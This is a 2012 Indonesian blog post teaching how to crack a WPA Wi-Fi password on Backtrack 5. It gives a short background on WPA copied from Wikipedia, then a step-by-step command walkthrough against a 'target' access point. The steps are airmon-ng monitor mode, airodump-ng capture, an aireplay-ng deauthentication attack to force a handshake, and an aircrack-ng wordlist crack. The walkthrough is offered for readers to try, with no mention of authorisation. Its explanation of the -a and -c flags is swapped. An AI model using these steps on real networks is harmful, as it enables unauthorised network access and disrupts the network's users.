Home » » Hack Password Wifi WPA key pada Backtrack 5

Hack Password Wifi WPA key pada Backtrack 5

Written By PKPD on Minggu, 12 Agustus 2012 | 13.05

WPA atau (Wi-Fi Protected Access) adalah suatu sistem yang juga dapat diterapkan untuk mengamankan jaringan nirkabel. Metoda pengamanan dengan WPA ini diciptakan untuk melengkapi dari sistem yamg sebelumnya, yaitu WEP. Para peneliti menemukan banyak celah dan kelemahan pada infrastruktur nirkabel yang menggunakan metoda pengamanan WEP. Sebagai pengganti dari sistem WEP, WPA mengimplementasikan layer dari IEEE, yaitu layer 802.11i. Nantinya WPA akan lebih banyak digunakan pada implementasi keamanan jaringan nirkabel. WPA didesain dan digunakan dengan alat tambahan lainnya, yaitu sebuah komputer pribadi (PC).

Fungsi dari komputer pribadi ini kemudian dikenal dengan istilah authentication server, yang memberikan key yang berbeda kepada masing–masing pengguna/client dari suatu jaringan nirkabel yang menggunakan akses point sebagai media sentral komunikasi. Seperti dengan jaringan WEP, metoda enkripsi dari WPA ini juga menggunakan algoritma RC4.
Pengamanan jaringan nirkabel dengan metoda WPA ini, dapat ditandai dengan minimal ada tiga pilihan yang harus diisi administrator jaringan agar jaringan dapat beroperasi pada mode WPA ini. Ketiga menu yang harus diisi tersebut adalah:
  • Server
    • Komputer server yang dituju oleh akses point yang akan memberi otontikasi kepada client. beberapa perangkat lunak yang biasa digunakan antara lain freeRADIUS, openRADIUS dan lain-lain.
  • Port
    • Nomor port yang digunakan adalah 1812.
  • Shared Secret
    • Shared Secret adalah kunci yang akan dibagikan ke komputer dan juga kepada client secara transparant.
Setelah komputer diinstall perangkat lunak otontikasi seperti freeRADIUS, maka sertifikat yang dari server akan dibagikan kepada client.
Untuk menggunakan Radius server bisa juga dengan tanpa menginstall perangkat lunak di sisi komputer client. Cara yang di gunakan adalah Web Authentication dimana User akan diarahkan ke halaman Login terlebih dahulu sebelum bisa menggunakan Jaringan Wireless. Dan Server yang menangani autentikasi adalah Radius server.

Ok mungkin cukup jelas penjelasan yang saya copy paste dari wikipedia diatas tentang WPA,dimana jaringan nirkabel atau wireles yang diproteksi oleh key ini agak lebih aman daripada WEP,akan tetapi dalam suatu system jaringan tidak ada yang 100% aman dan masih banyak celah yang dapat dimanfaatkan oleh para attacker.ok dalam praktek ini,mari kita buktikan seberapa amankah security WPA ini.

Dalam kasus ini  para attacker memerlukan beberapa alat perang yang  wajib ada diantaranya

PC/Laptop
OS Backtrack 5 R1
Wordlist 
Wireles/Usb Wirles + Antena Outdor (untuk jarak jauh)

Oh ya Perlu diketahui untuk mengcrack password wifi WPA key ini memerlukan Wordlist,dimana wordlist ini nantinya akan disamakan dengan hasil snifing accses point target dengan backtrack5 apabila ada yang sama maka proses cracking pasti berhasil akan tetapi apabila dalam wordlist tidak ada pasword yang cocok atau yang sama dengan password accses point target  maka proses cracking tidak akan berhasil
 
Dalam percobaan kali ini,saya menggunakan OS Backtrack 5 R1 pada mesin Vmware workstation.di windows7 dan satu buah wireles USB yang suport untuk linux dalam kasus ini saya menggunakan wirless USB TP-Link TL-WN722N 

Buat temen temen yang belum tau apa itu Vmware sebaiknya baca terlebih dahulu artikel saya sebelumnya tentang 
Untuk memulai proses cracking,tentunya dibutuhkan pengetahuan dasar dan console console yang telah ditentukan dalam praktek ini kita menggunakan beberapa console diantaranya airmon-ng,airodump-ng,danjuga aircrack-ng.
Baik kita mulai saja,langkah pertama runing OS backtrack5 di vmware,jika sudah masuk pada tampilan desktop kemudian buka terminal dan ketikan perintah dibawah secara berurut:


airmon-ng
  
airmon-ng start wlan0
  
airodump-ng mon0

airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w filehasilsniffing mon0

keterangan XX:XX:XX:XX:XX masukan bssid accsess point target

aireplay-ng -0 0 -a XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX mon0

keterangan -0 0 code deauth 
-a XX:XX:XX:XX:XX bssid client target
-c XX:XX:XX:XX:XX bssid Acsess Point

(sampai diatasnya keluar WPA handshake)
ls 

(cari file filehasilsniffing.cap)

aircrack-ng -w worldlist filehasilsnif.cap

tunggu proses cracking ,apabila berhasil maka akan ada keterangan key found

Selamat mencoba


 
Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

 
Support : Creating Website | Baso Irwan Sakti Template | Template
Copyright © 2012. Baso Onhacker - All Rights Reserved
Template Created by Creating Website Published by Template
Proudly powered by I'm not hacker